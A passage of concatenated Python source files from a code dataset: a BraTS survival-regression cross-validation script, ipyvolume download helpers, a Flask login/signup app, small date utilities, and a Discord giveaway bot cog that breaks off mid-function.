list(calendar.month_abbr).index(date_stop_list[1]), int(date_stop_list[0])) - date(int(date_start_list[2]), list(calendar.month_abbr).index(date_start_list[1]), int(date_start_list[0]))\n\n\nprint (days_between.days, \"days\")\n","sub_path":"python/q5_datetime.py","file_name":"q5_datetime.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"574817058","text":"\r\nimport pandas as pd \r\n\r\nf = open(\"D:\\\Latest programs & data that work -in IDLE-/1st 495 symbols.csv\", \"r\")\r\n\r\n\r\ndf_old = pd.read_csv(\"A.csv\")\r\nprint(df_old.head())\r\ndf_old.drop([\"volume\", \"timestamp\", \"open\", \"high\", \"low\"], axis = 1, inplace = True)\r\nprint(df_old.head())\r\n\r\n'''\r\nfor symbol in 
f.readlines():\r\n\r\n symbol = symbol.strip()\r\n\r\n url_part1 = symbol\r\n url_part2 = \".csv\"\r\n url = url_part1 + url_part2 \r\n print(url)\r\n df_old = pd.read_csv(url)\r\n df_old.head()\r\n #sdf_old.drop([\"volume\", \"timestamp\", \"open\", \"high\", \"low\"], axis = 1, inplace = True)'''\r\n \r\n \r\n\r\n","sub_path":"Column grouper thingie V1.py","file_name":"Column grouper thingie V1.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"578560639","text":"#!/home/yannick/anaconda3/envs/py36/bin/python\n\n\nimport json\nimport numpy as np\nimport os\nimport pandas as pd\nfrom skfeature.function.information_theoretical_based import CIFE, JMI, DISR, MIM, CMIM, ICAP, MRMR, MIFS\nfrom skfeature.function.similarity_based import reliefF, fisher_score\nfrom skfeature.function.statistical_based import chi_square, gini_index\n\nfrom sklearn.ensemble.forest import RandomForestRegressor, ExtraTreesRegressor\nfrom sklearn.ensemble.bagging import BaggingRegressor\nfrom sklearn.experimental import enable_hist_gradient_boosting # noqa\nfrom sklearn.ensemble import HistGradientBoostingClassifier\n\nfrom sklearn.ensemble.weight_boosting import AdaBoostRegressor\nfrom sklearn.gaussian_process.gpr import GaussianProcessRegressor\nfrom sklearn.isotonic import IsotonicRegression\nfrom sklearn.linear_model.bayes import ARDRegression\nfrom sklearn.linear_model.huber import HuberRegressor\nfrom sklearn.linear_model.base import LinearRegression\nfrom sklearn.linear_model.passive_aggressive import PassiveAggressiveRegressor\nfrom sklearn.linear_model.stochastic_gradient import SGDRegressor\nfrom sklearn.linear_model.theil_sen import TheilSenRegressor\nfrom sklearn.linear_model.ransac import RANSACRegressor\nfrom sklearn.neighbors.regression import KNeighborsRegressor\nfrom sklearn.neighbors.regression import RadiusNeighborsRegressor\nfrom sklearn.neural_network.multilayer_perceptron import MLPRegressor\nfrom sklearn.tree.tree import DecisionTreeRegressor, ExtraTreeRegressor\nfrom sklearn.svm.classes import SVR\n\nfrom sklearn.metrics import accuracy_score, balanced_accuracy_score, mean_squared_error, r2_score\nfrom scipy.stats import spearmanr # spearmanr(currttpdata_bratumia[\"TTP\"].values, currttpdata_bratumia[\"OS\"].values, nan_policy='omit')\n\nfrom tqdm import tqdm\n\n\ndef survival_classencoding(survarr: np.array, classboundaries: list):\n if len(classboundaries) == 1:\n survival_classes = [0 if elem <= classboundaries[0] else 1 for elem in survarr]\n\n if len(classboundaries) == 2:\n survival_classes = [int(0) if elem <= classboundaries[0] else int(1) if elem <= classboundaries[1] else int(2) for elem in\n survarr]\n\n return np.array(survival_classes)\n\n\ndef writeresults(outdf, sel_name, clf_name, split, param1, param2, acc, balacc, mse, r2, rho):\n curr_resultsdict = {\"Feature selector\": sel_name,\n \"ML method\": clf_name,\n \"Split\": split,\n \"Parameter1\": param1,\n \"Parameter2\": param2,\n \"Accuracy\": acc,\n \"Balanced Accuracy\": balacc,\n \"MSE\": mse,\n \"r2\": r2,\n \"spearmanr\": rho\n }\n\n outdf = outdf.append(curr_resultsdict, ignore_index=True)\n print(outdf)\n outdf.to_csv(\n \"/media/yannick/c4a7e8d3-9ac5-463f-b6e6-92e216ae6ac0/BRATS/BraTS2020/featsel_outputs/cvresults_seqprior_regression.csv\",\n index=False)\n\n return outdf\n\n\ndef gradeoutput(y_test, y_pred, class_boundary):\n\n y_test_classes = survival_classencoding(y_test, class_boundary)\n y_pred_classes = 
survival_classencoding(y_pred, class_boundary)\n acc = accuracy_score(y_test_classes, y_pred_classes)\n balacc = balanced_accuracy_score(y_test_classes, y_pred_classes)\n mse = mean_squared_error(y_test, y_pred)\n r2 = r2_score(y_test, y_pred)\n rho, _ = spearmanr(y_test, y_pred, nan_policy='omit')\n\n return [balacc, acc, mse, r2, rho]\n\n\nclass_boundary = [304.2, 456.25]\n\n# features = pd.read_csv(\"/media/yannick/c4a7e8d3-9ac5-463f-b6e6-92e216ae6ac0/BRATS/BraTS2020/featsel_outputs/training_scaledfeat.csv\", index_col=\"ID\")\nfeatures = pd.read_csv(\"/media/yannick/c4a7e8d3-9ac5-463f-b6e6-92e216ae6ac0/BRATS/BraTS2020/featsel_outputs/training_scaledfeat2.csv\", index_col=\"ID\")\nsplitinfopath = \"/media/yannick/c4a7e8d3-9ac5-463f-b6e6-92e216ae6ac0/BRATS/BraTS2020/featsel_outputs/splitinfo.json\"\n\nfeatures_nosurv = features.drop(columns=\"Survival_days\", inplace=False)\nsurv_days = features[\"Survival_days\"]\nsurv_classes = survival_classencoding(surv_days, class_boundary)\n\n# only use features from the T1c and FLAIR MRIs\ncolselect = [elem for elem in features_nosurv.columns if (('T1c' in elem) or (\"FLAIR\" in elem) or (\"Age\" in elem) or (\"z_mincet\" in elem) or (\"cet_ventrdist\" in elem))]\ndropcols = list(set(features_nosurv.columns) - set(colselect))\nfeatures_nosurv.drop(columns=dropcols, inplace=True)\nnp.random.seed(42)\n\n# load split infos\nwith open(splitinfopath) as f:\n kfolds = json.load(f)\n\nnumfeat = 9\n\nrandomstate = 42\nclassifiernames = [\"Random Forest\",\n \"Extra Trees\",\n # \"Hist. Gradient Boosting\",\n \"AdaBoost\",\n \"Gaussian Process\",\n \"ARD\",\n # \"Huber\",\n \"Linear\",\n \"Passive Aggressive\",\n \"SGD\",\n \"Theil-Sen\",\n \"RANSAC\",\n \"K-Neighbors\",\n \"Radius Neighbors\",\n \"MLP\",\n \"Decision Tree\",\n \"Extra Tree\",\n \"SVR\"\n ]\n\nclassifiers = [\n RandomForestRegressor(n_estimators=200, n_jobs=5, random_state=randomstate),\n ExtraTreesRegressor(n_estimators=200, n_jobs=5, random_state=randomstate),\n # GradientBoostingRegressor(random_state=randomstate), # learning_rate is a hyper-parameter in the range (0.0, 1.0]\n # HistGradientBoostingClassifier(random_state=randomstate), # learning_rate is a hyper-parameter in the range (0.0, 1.0]\n AdaBoostRegressor(n_estimators=200, random_state=randomstate),\n GaussianProcessRegressor(normalize_y=True),\n ARDRegression(),\n # HuberRegressor(), # epsilon: greater than 1.0, default 1.35\n LinearRegression(n_jobs=5),\n PassiveAggressiveRegressor(random_state=randomstate), # C: 0.25, 0.5, 1, 5, 10\n SGDRegressor(random_state=randomstate),\n TheilSenRegressor(n_jobs=5, random_state=randomstate),\n RANSACRegressor(random_state=randomstate),\n KNeighborsRegressor(weights='distance'), # n_neighbors: 3, 6, 9, 12, 15, 20\n RadiusNeighborsRegressor(weights='distance'), # radius: 1, 2, 5, 10, 15\n MLPRegressor(max_iter=10000000, random_state=randomstate),\n DecisionTreeRegressor(random_state=randomstate), # max_depth = 2, 3, 4, 6, 8\n ExtraTreeRegressor(random_state=randomstate), # max_depth = 2, 3, 4, 6, 8\n SVR() # C: 0.25, 0.5, 1, 5, 10\n]\n\nselectors = [\n reliefF.reliefF,\n fisher_score.fisher_score,\n chi_square.chi_square,\n JMI.jmi,\n CIFE.cife,\n DISR.disr,\n MIM.mim,\n CMIM.cmim,\n ICAP.icap,\n MRMR.mrmr,\n MIFS.mifs]\n\nselectornames_short = [\"RELF\", \"FSCR\", \"CHSQ\", \"JMI\", \"CIFE\", \"DISR\", \"MIM\", \"CMIM\", \"ICAP\", \"MRMR\", \"MIFS\"]\n\n# class boundary list\nclass_boundary = [304.2, 456.25]\nnumsplits = 10\n\n# Dataframe for highest balanced accuracy for each feature 
selector / ML combination\noutdf = pd.DataFrame(data=[], columns=[\"Feature selector\", \"ML method\", \"Split\", \"Parameter1\", \"Parameter2\", \"Accuracy\", \"Balanced Accuracy\", \"MSE\", \"r2\", \"spearmanr\"])\n\nfor split in np.arange(numsplits):\n print(\"Evaluating fold \" + str(split))\n train_index = kfolds[\"fold_\" + str(split)][\"train\"]\n test_index = kfolds[\"fold_\" + str(split)][\"test\"]\n\n X_train, X_test = features_nosurv.iloc[train_index], features_nosurv.iloc[test_index]\n y_train, y_test = surv_days[train_index], surv_days[test_index]\n # y_train, y_test = surv_classes[train_index], surv_classes[test_index]\n\n # for every split, perform feature selection\n for sel_name, sel in zip(selectornames_short, selectors):\n print('#####')\n print(sel_name)\n print('#####')\n\n if sel_name is \"CHSQ\":\n # shift X values to be non-negative for chsq feature selection\n X_train_tmp = X_train + np.abs(X_train.min())\n selscore = sel(X_train_tmp, y_train)\n selidx = np.argsort(selscore)[::-1]\n selidx = selidx[0:numfeat]\n selscore = selscore[selidx]\n selscoredf = pd.DataFrame(\n data=np.transpose(np.vstack((X_train.columns[selidx].values, selscore))),\n columns=['Feature', 'Score'])\n\n elif sel_name == \"RELF\":\n selscore = sel(X_train.values, y_train, k=numfeat)\n\n selidx = np.argsort(selscore)[::-1]\n # print(selidx)\n selidx = selidx[0:numfeat]\n selscoredf = pd.DataFrame(\n data=np.transpose(np.vstack((X_train.columns[selidx].values, selscore[selidx]))),\n columns=['Feature', 'Score'])\n\n elif sel_name == \"JMI\" or sel_name == \"CIFE\" or sel_name == \"DISR\" or sel_name == \"MIM\" \\\n or sel_name == \"CMIM\" or sel_name == \"ICAP\" or sel_name == \"MRMR\" or sel_name == \"MIFS\":\n selidx, selscore, _ = sel(X_train.values, y_train, n_selected_features=numfeat)\n selscoredf = pd.DataFrame(\n data=np.transpose(np.vstack((X_train.columns[selidx].values, selscore))),\n columns=['Feature', 'Score'])\n\n else:\n selscore = sel(X_train.values, y_train)\n\n selidx = np.argsort(selscore)[::-1]\n # print(selidx)\n selidx = selidx[0:numfeat]\n selscoredf = pd.DataFrame(\n data=np.transpose(np.vstack((X_train.columns[selidx].values, selscore[selidx]))),\n columns=['Feature', 'Score'])\n\n # get subsets for all number of features\n X_train_selected = X_train.iloc[:, selidx[0:numfeat]]\n X_test_selected = X_test.iloc[:, selidx[0:numfeat]]\n\n ##########################################\n # do classification with all classifiers #\n ##########################################\n best_param1 = np.NaN\n best_param2 = np.NaN\n best_balacc = np.NaN\n\n for clf_name, clf in zip(classifiernames, classifiers):\n print(clf_name)\n\n if clf_name is \"Passive Aggressive\":\n param1 = np.NaN\n param2 = np.NaN\n C = [0.25, 0.5, 1, 5, 10]\n for param1 in tqdm(C):\n clf = PassiveAggressiveRegressor(C=param1, random_state=randomstate)\n\n clf.fit(X_train_selected, y_train)\n\n y_pred = clf.predict(X_test_selected)\n y_train_pred = clf.predict(X_train_selected)\n\n balacc, acc, mse, r2, rho = gradeoutput(y_test, y_pred, class_boundary)\n outdf = writeresults(outdf, sel_name, clf_name, split, param1, param2, acc, balacc, mse, r2, rho)\n\n elif clf_name is \"SVR\":\n param1 = np.NaN\n param2 = np.NaN\n C = [0.25, 0.5, 1, 5, 10]\n for param1 in tqdm(C):\n clf = SVR(C=param1)\n\n clf.fit(X_train_selected, y_train)\n\n y_pred = clf.predict(X_test_selected)\n y_train_pred = clf.predict(X_train_selected)\n\n balacc, acc, mse, r2, rho = gradeoutput(y_test, y_pred, class_boundary)\n outdf = 
writeresults(outdf, sel_name, clf_name, split, param1, param2, acc, balacc, mse, r2, rho)\n\n            elif clf_name == \"Decision Tree\":\n                param1 = np.NaN\n                param2 = np.NaN\n                max_depthlist = [2, 3, 4, 6, 8]\n                for param1 in tqdm(max_depthlist):\n                    clf = DecisionTreeRegressor(max_depth=param1, random_state=randomstate)\n\n                    clf.fit(X_train_selected, y_train)\n\n                    y_pred = clf.predict(X_test_selected)\n                    y_train_pred = clf.predict(X_train_selected)\n\n                    balacc, acc, mse, r2, rho = gradeoutput(y_test, y_pred, class_boundary)\n                    outdf = writeresults(outdf, sel_name, clf_name, split, param1, param2, acc, balacc, mse, r2, rho)\n\n            elif clf_name == \"Extra Tree\":\n                param1 = np.NaN\n                param2 = np.NaN\n                max_depthlist = [2, 3, 4, 6, 8]\n                for param1 in tqdm(max_depthlist):\n                    clf = ExtraTreeRegressor(max_depth=param1, random_state=randomstate)\n\n                    clf.fit(X_train_selected, y_train)\n\n                    y_pred = clf.predict(X_test_selected)\n                    y_train_pred = clf.predict(X_train_selected)\n\n                    balacc, acc, mse, r2, rho = gradeoutput(y_test, y_pred, class_boundary)\n                    outdf = writeresults(outdf, sel_name, clf_name, split, param1, param2, acc, balacc, mse, r2, rho)\n\n            # elif clf_name is \"Hist. Gradient Boosting\":\n            #     param1 = np.NaN\n            #     param2 = np.NaN\n            #     lr_list = [0.1, 0.3, 0.6, 0.9]\n            #     for param1 in tqdm(lr_list):\n            #         clf = HistGradientBoostingClassifier(learning_rate=param1, random_state=randomstate)\n            #\n            #         clf.fit(X_train_selected, y_train)\n            #\n            #         y_pred = clf.predict(X_test_selected)\n            #         y_train_pred = clf.predict(X_train_selected)\n            #\n            #         balacc, acc, mse, r2, rho = gradeoutput(y_test, y_pred, class_boundary)\n            #         outdf = writeresults(outdf, sel_name, clf_name, split, param1, param2, acc, balacc, mse, r2, rho)\n\n            elif clf_name == \"Huber\":\n                param1 = np.NaN\n                param2 = np.NaN\n                eps_list = [1.1, 1.2, 1.35, 1.5, 2]  # epsilon: greater than 1.0, default 1.35\n                for param1 in tqdm(eps_list):\n                    clf = HuberRegressor(epsilon=param1)\n\n                    clf.fit(X_train_selected, y_train)\n\n                    y_pred = clf.predict(X_test_selected)\n                    y_train_pred = clf.predict(X_train_selected)\n\n                    balacc, acc, mse, r2, rho = gradeoutput(y_test, y_pred, class_boundary)\n                    outdf = writeresults(outdf, sel_name, clf_name, split, param1, param2, acc, balacc, mse, r2, rho)\n\n            elif clf_name == \"K-Neighbors\":\n                param1 = np.NaN\n                param2 = np.NaN\n\n                neighbors_list = [3, 6, 9, 12, 15, 20]  # number of neighbors to try\n                for param1 in tqdm(neighbors_list):\n                    clf = KNeighborsRegressor(n_neighbors=param1, weights='distance')\n\n                    clf.fit(X_train_selected, y_train)\n\n                    y_pred = clf.predict(X_test_selected)\n                    y_train_pred = clf.predict(X_train_selected)\n\n                    balacc, acc, mse, r2, rho = gradeoutput(y_test, y_pred, class_boundary)\n                    outdf = writeresults(outdf, sel_name, clf_name, split, param1, param2, acc, balacc, mse, r2, rho)\n\n            elif clf_name == \"Radius Neighbors\":\n                param1 = np.NaN\n                param2 = np.NaN\n\n                radius_list = [1, 2, 5, 10, 15]  # radius values to try\n                for param1 in tqdm(radius_list):\n                    clf = RadiusNeighborsRegressor(radius=param1, weights='distance')\n\n                    clf.fit(X_train_selected, y_train)\n\n                    y_pred = clf.predict(X_test_selected)\n                    y_train_pred = clf.predict(X_train_selected)\n\n                    balacc, acc, mse, r2, rho = gradeoutput(y_test, y_pred, class_boundary)\n                    outdf = writeresults(outdf, sel_name, clf_name, split, param1, param2, acc, balacc, mse, r2,\n                                         rho)\n\n            else:\n                param1 = np.NaN\n                param2 = np.NaN\n\n                clf.fit(X_train_selected, y_train)\n\n                y_pred = clf.predict(X_test_selected)\n                y_train_pred = 
clf.predict(X_train_selected)\n\n balacc, acc, mse, r2, rho = gradeoutput(y_test, y_pred, class_boundary)\n outdf = writeresults(outdf, sel_name, clf_name, split, param1, param2, acc, balacc, mse, r2,\n rho)\n\n\noutdf.to_csv(\"/media/yannick/c4a7e8d3-9ac5-463f-b6e6-92e216ae6ac0/BRATS/BraTS2020/featsel_outputs/cvresults_ageshape_regression.csv\", index=False)\n","sub_path":"classicalml/regression/cveval_regression_ageshape.py","file_name":"cveval_regression_ageshape.py","file_ext":"py","file_size_in_byte":16410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"300634733","text":"from __future__ import print_function\nimport collections\nimport requests\nimport io\nimport os\n\n\n# https://stackoverflow.com/questions/14267555/find-the-smallest-power-of-2-greater-than-n-in-python\ndef next_power_of_2(x):\n return 1 if x == 0 else 2**(x - 1).bit_length()\n\n# original from http://stackoverflow.com/questions/3232943/update-value-of-a-nested-dictionary-of-varying-depth\ndef dict_deep_update(d, u):\n for k, v in u.items():\n if isinstance(v, collections.Mapping):\n r = dict_deep_update(d.get(k, {}), v)\n d[k] = r\n else:\n d[k] = u[k]\n return d\n\ndef nested_setitem(obj, dotted_name, value):\n items = dotted_name.split(\".\")\n for item in items[:-1]:\n if item not in obj:\n obj[item] = {}\n obj = obj[item]\n obj[items[-1]] = value\n\n\ndef download_to_bytes(url, chunk_size=1024*1024*10, loadbar_length=10):\n \"\"\" download a url to bytes\n\n if chunk_size is not None, prints a simple loading bar [=*loadbar_length] to show progress (in console and notebook)\n\n :param url: str or url\n :param chunk_size: None or int in bytes\n :param loadbar_length: int length of load bar\n :return: (bytes, encoding)\n \"\"\"\n\n stream = False if chunk_size is None else True\n\n print(\"Downloading {0:s}: \".format(url), end=\"\")\n\n response = requests.get(url, stream=stream)\n # raise error if download was unsuccessful\n response.raise_for_status()\n\n encoding = response.encoding\n total_length = response.headers.get('content-length')\n if total_length is not None:\n total_length = float(total_length)\n if stream:\n print(\"{0:.2f}Mb/{1:} \".format(total_length / (1024 * 1024), loadbar_length), end=\"\")\n else:\n print(\"{0:.2f}Mb \".format(total_length / (1024 * 1024)), end=\"\")\n\n if stream:\n print(\"[\", end=\"\")\n chunks = []\n loaded = 0\n loaded_size = 0\n for chunk in response.iter_content(chunk_size=chunk_size):\n if chunk: # filter out keep-alive new chunks\n # print our progress bar\n if total_length is not None:\n while loaded < loadbar_length * loaded_size / total_length:\n print(\"=\", end='')\n loaded += 1\n loaded_size += chunk_size\n chunks.append(chunk)\n if total_length is None:\n print(\"=\" * loadbar_length, end='')\n else:\n while loaded < loadbar_length:\n print(\"=\", end='')\n loaded += 1\n content = b\"\".join(chunks)\n print(\"] \", end=\"\")\n else:\n content = response.content\n print(\"Finished\")\n\n response.close()\n\n return content, encoding\n\n\ndef download_yield_bytes(url, chunk_size=1024*1024*10):\n \"\"\" yield a downloaded url as byte chunks\n\n :param url: str or url\n :param chunk_size: None or int in bytes\n :yield: byte chunks\n \"\"\"\n\n response = requests.get(url, stream=True)\n # raise error if download was unsuccessful\n response.raise_for_status()\n\n total_length = response.headers.get('content-length')\n if total_length is not None:\n total_length = float(total_length)\n length_str = 
\"{0:.2f}Mb \".format(total_length / (1024 * 1024))\n else:\n length_str = \"\"\n\n print(\"Yielding {0:s} {1:s}\".format(url, length_str))\n for chunk in response.iter_content(chunk_size=chunk_size):\n yield chunk\n response.close()\n\n\ndef download_to_file(url, filepath, resume=False, overwrite=False, chunk_size=1024*1024*10, loadbar_length=10):\n \"\"\" download a url\n\n prints a simple loading bar [=*loadbar_length] to show progress (in console and notebook)\n\n :type url: str\n :type filepath: str\n :param filepath: path to download to\n :param resume: if True resume download from existing file chunk\n :param overwrite: if True remove any existing filepath\n :param chunk_size: None or int in bytes\n :param loadbar_length: int length of load bar\n :return:\n \"\"\"\n\n resume_header = None\n loaded_size = 0\n write_mode = 'wb'\n\n if os.path.exists(filepath):\n if overwrite:\n os.remove(filepath)\n elif resume:\n # if we want to resume, first try and see if the file is already complete\n loaded_size = os.path.getsize(filepath)\n clength = requests.head(url).headers.get('content-length')\n if clength is not None:\n if int(clength) == loaded_size:\n return None\n # give the point to resume at\n resume_header = {'Range': 'bytes=%s-' % loaded_size}\n write_mode = 'ab'\n else:\n return None\n\n stream = False if chunk_size is None else True\n\n # start printing with no return character, so that we can have everything on one line\n print(\"Downloading {0:s}: \".format(url), end=\"\")\n\n response = requests.get(url, stream=stream, headers=resume_header)\n # raise error if download was unsuccessful\n response.raise_for_status()\n\n # get the size of the file if available\n total_length = response.headers.get('content-length')\n if total_length is not None:\n total_length = float(total_length) + loaded_size\n print(\"{0:.2f}Mb/{1:} \".format(total_length / (1024 * 1024), loadbar_length), end=\"\")\n print(\"[\", end=\"\")\n\n parent = os.path.dirname(filepath)\n if not os.path.exists(parent) and parent:\n os.makedirs(parent)\n\n with io.open(filepath, write_mode) as f:\n loaded = 0\n for chunk in response.iter_content(chunk_size=chunk_size):\n if chunk: # filter out keep-alive new chunks\n # print our progress bar\n if total_length is not None and chunk_size is not None:\n while loaded < loadbar_length*loaded_size/total_length:\n print(\"=\", end='')\n loaded += 1\n loaded_size += chunk_size\n f.write(chunk)\n if total_length is None:\n print(\"=\" * loadbar_length, end='')\n else:\n while loaded < loadbar_length:\n print(\"=\", end='')\n loaded += 1\n print(\"] Finished\")\n","sub_path":"ipyvolume/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"558307154","text":"import datetime\nwhile True:\n num=input(\"Enter your number: \")\n if 1<=int(num)<=7:\n first=datetime.date(2021,4,10)\n day=first+datetime.timedelta(days=int(num))\n week=day.strftime('%A')\n print(week)\n else:\n print(\"You can use only 1 between 7 \")\n\n","sub_path":"Time/Time_task_9.4.py","file_name":"Time_task_9.4.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"297882709","text":"#-*- coding: utf-8 -*-\nfrom app import app\nfrom flask import render_template, request, flash, redirect, session, url_for\nfrom datetime import timedelta\nfrom forms import SignupForm, LoginForm\nfrom models import db, 
User, Match, and_\nfrom util import Util, MatchingUtil\nfrom api import MatchingUser\n\n@app.before_request\ndef make_session_permanent():\n    session.permanent = True\n    app.permanent_session_lifetime = timedelta(minutes=60)\n\n@app.route('/')\ndef home():\n\tif 'email' in session and 'token' in session and User.verify_auth_token(session['token'], app.config['SECRET_KEY']):\n\t\treturn redirect(url_for('profile'))\n\telse:\n\t\treturn render_template('index.html')\n\n@app.route('/match')\ndef match():\n\tif 'email' in session and 'token' in session and User.verify_auth_token(session['token'], app.config['SECRET_KEY']):\n\t\treturn render_template('match.html')\n\telse:\n\t\treturn redirect(url_for('login'))\n\n@app.route('/signup', methods=['GET', 'POST'])\ndef signup():\n\tform = SignupForm()\n\n\tif request.method == 'POST':\n\t\tif form.validate() is False:\n\t\t\treturn render_template('signup.html', form=form)\n\t\telse:\n\t\t\tnew_user = User(form.name.data,\n\t\t\t\tform.password.data,\n\t\t\t\tform.gender.data,\n\t\t\t\tform.age.data,\n\t\t\t\tform.email.data,\n\t\t\t\tform.location.data,\n\t\t\t\tform.favorite_area.data)\n\t\t\tdb.session.add(new_user)\n\t\t\tdb.session.commit()\n\n\t\t\tsession['email'] = new_user.email\n\n\t\t\treturn redirect(url_for('profile'))\n\n\telif request.method == 'GET':\n\t\treturn render_template('signup.html', form=form)\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n\tform = LoginForm()\n\n\tif 'email' in session:\n\t\treturn redirect(url_for('profile'))\n\n\tif request.method == 'POST':\n\t\tif form.validate() is False:\n\t\t\treturn render_template('login.html', form=form)\n\t\telse:\n\t\t\tsession['email'] = form.email.data\n\t\t\treturn redirect(url_for('profile'))\n\telif request.method == 'GET':\n\t\treturn render_template('login.html', form=form)\n\n@app.route('/profile')\ndef profile():\n\tif 'email' not in session:\n\t\treturn redirect(url_for('login'))\n\n\tuser = User.query.filter_by(email = session['email']).first()\n\tif user is None:\n\t\treturn redirect(url_for('login'))\n\n\ttoken = user.generate_auth_token(app.config['SECRET_KEY'])\n\tsession['token'] = token\n\treturn render_template('profile.html', data=user)\n\n@app.route('/logout')\ndef logout():\n\tif 'email' not in session:\n\t\treturn redirect(url_for('login'))\n\n\tsession.pop('email', None)\n\tsession.pop('token', None)\n\tsession.clear()\n\treturn redirect(url_for('home'))","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"612469365","text":"import discord\nfrom discord.ext import commands\nfrom .utils.dataIO import fileIO\nfrom .utils import checks\nimport os\nimport asyncio\nimport time\nimport logging\nimport random\nimport datetime\n\n\nclass MOTORSPORT_GIVEAWAY:\n    \"\"\"It's all about MotorSport - Giveaway System\"\"\"\n\n    def __init__(self, bot):\n        self.bot = bot\n        self.giveaways = fileIO(\"data/MotorSport/giveaway/giveaway.json\", \"load\")\n        self.units = {\"second\": 1, \"day\": 86400, \"week\": 604800, \"month\": 2592000}\n\n    @commands.command(pass_context=True, no_pm=True)\n    @checks.admin_or_permissions()\n    async def giveaway(self, ctx, quantity: int, time_unit: str, *, message: str):\n        \"\"\"Generate Giveaway\n\n        The time unit must be: days, weeks, month\n        For example:\n        .giveaway 3 days Holiday Time\"\"\"\n        author = ctx.message.author\n        server = ctx.message.server\n        time_unit = time_unit.lower()\n        s = \"\"\n        if time_unit.endswith(\"s\"):\n            
time_unit = time_unit[:-1]\n s = \"s\"\n if not time_unit in self.units:\n await self.bot.say(\"Invalid time unit. Choose days/weeks/month\")\n return\n if quantity < 1:\n await self.bot.say(\"Quantity must not be 0 or negative.\")\n return\n if len(message) > 1960:\n await self.bot.say(\"The message is too long.\")\n return\n name = author.nick\n seconds = self.units[time_unit] * quantity\n future = int(time.time() + seconds)\n logger.info(\"{} ({}) start giveaway.\".format(author.name, author.id))\n giveaways_channel = discord.utils.get(\n server.channels, name='giveaways', type=discord.ChannelType.text)\n embed = discord.Embed(title=\"Premium Deluxe Motorsport Giveaway\", colour=discord.Colour(\n 0x984c87), description=message + \"\\n\\n**To join, react with 🏆**\")\n embed.set_thumbnail(url=server.icon_url)\n msg = await self.bot.send_message(giveaways_channel, embed=embed)\n reaction = '🏆'\n await self.bot.add_reaction(msg, reaction)\n await self.bot.delete_message(ctx.message)\n self.giveaways.append({\"ID\": author.id, \"msg\": msg.id, \"FUTURE\": future, \"message\": message})\n fileIO(\"data/MotorSport/giveaway/giveaway.json\", \"save\", self.giveaways)\n\n async def check_giveaway(self):\n getMSserver = self.bot.get_server('341928926098096138')\n giveaways_channel = discord.utils.get(getMSserver.channels, name='giveaways', type=discord.ChannelType.text)\n management_channel = discord.utils.get(getMSserver.channels, name='management', type=discord.ChannelType.text)\n won_role = discord.utils.get(getMSserver.roles, name='The Winners')\n while self is self.bot.get_cog(\"MOTORSPORT_GIVEAWAY\"):\n to_remove = []\n for giveaway in self.giveaways:\n if giveaway[\"FUTURE\"] <= int(time.time()):\n count = 1\n try:\n themessage = await self.bot.get_message(giveaways_channel, giveaway[\"msg\"])\n result = await self.bot.get_reaction_users(themessage.reactions[0])\n if len(result) <= 1:\n winner = self.bot.user\n winner2 = 'Nobody'\n else:\n winner = random.choice(result)\n while True:\n the_member = getMSserver.get_member(winner.id)\n if any(r.name == 'The Winners' for r in the_member.roles) or winner == self.bot.user:\n winner = random.choice(result)\n count = count + 1\n else:\n winner2 = winner.mention\n break\n if count > 5:\n winner2 = 'Nobody'\n break\n embed = discord.Embed(title=\"Premium Deluxe Motorsport Giveaway\", colour=discord.Colour(\n 0x984c87), description=\"{}\\n\\n{} wins\".format(giveaway[\"message\"], winner2))\n if winner.avatar_url is None:\n embed.set_thumbnail(url=getMSserver.icon_url)\n else:\n embed.set_thumbnail(url=winner.avatar_url)\n # embed.set_author(name=name, icon_url=server.icon_url)\n await self.bot.delete_message(themessage)\n final_result = \"User List from {}: \".format(giveaway[\"message\"])\n for r in result:\n final_result = final_result + \"{}#{}, \".format(r.name, r.discriminator)\n if winner2 == 'Nobody':\n embed.set_thumbnail(url=getMSserver.icon_url)\n await self.bot.send_message(management_channel, final_result)\n await self.bot.send_message(giveaways_channel, embed=embed)\n if winner2 != 'Nobody':\n try:\n await self.bot.send_message(winner, embed=embed)\n except discord.errors.Forbidden:\n await self.bot.send_message(management_channel, \"**[Warning]** {} turned off his PM\".format(winner.mention))\n await self.bot.add_roles(the_member, won_role)\n # await self.bot.send_message(discord.User(id=inactive[\"ID\"]), embed=embed)\n except (discord.errors.Forbidden, discord.errors.NotFound):\n to_remove.append(giveaway)\n except 
discord.errors.HTTPException:\n                        pass\n                    else:\n                        to_remove.append(giveaway)\n                if giveaway[\"FUTURE\"] > int(time.time()):\n                    try:\n                        themessage = await self.bot.get_message(giveaways_channel, giveaway[\"msg\"])\n                        timeleft = giveaway[\"FUTURE\"] - int(time.time())\n                        embed = discord.Embed(title=\"Premium Deluxe Motorsport Giveaway\", colour=discord.Colour(0x984c87), description=giveaway[\"message\"] + \"\\n\\n**To join, react with 🏆**\\n\\n**Time Left: {}**\".format(datetime.timedelta(seconds=timeleft)))\n                        embed.set_thumbnail(url=getMSserver.icon_url)\n                        await self.bot.edit_message(themessage, embed=embed)\n                    except (discord.errors.Forbidden, discord.errors.NotFound):\n                        to_remove.append(giveaway)\n                    except discord.errors.HTTPException:\n                        pass\n            for giveaway in to_remove:\n                self.giveaways.remove(giveaway)\n            if to_remove:\n                fileIO(\"data/MotorSport/giveaway/giveaway.json\", \"save\", self.giveaways)\n            await asyncio.sleep(5)\n\n\ndef check_folders():\n    if not os.path.exists(\"data/MotorSport/giveaway/\"):\n        print(\"Creating data/MotorSport/giveaway/ folder...\")\n        os.makedirs(\"data/MotorSport/giveaway/\")\n\n\ndef check_files():\n    f = \"data/MotorSport/giveaway/giveaway.json\"\n    if not fileIO(f, \"check\"):\n        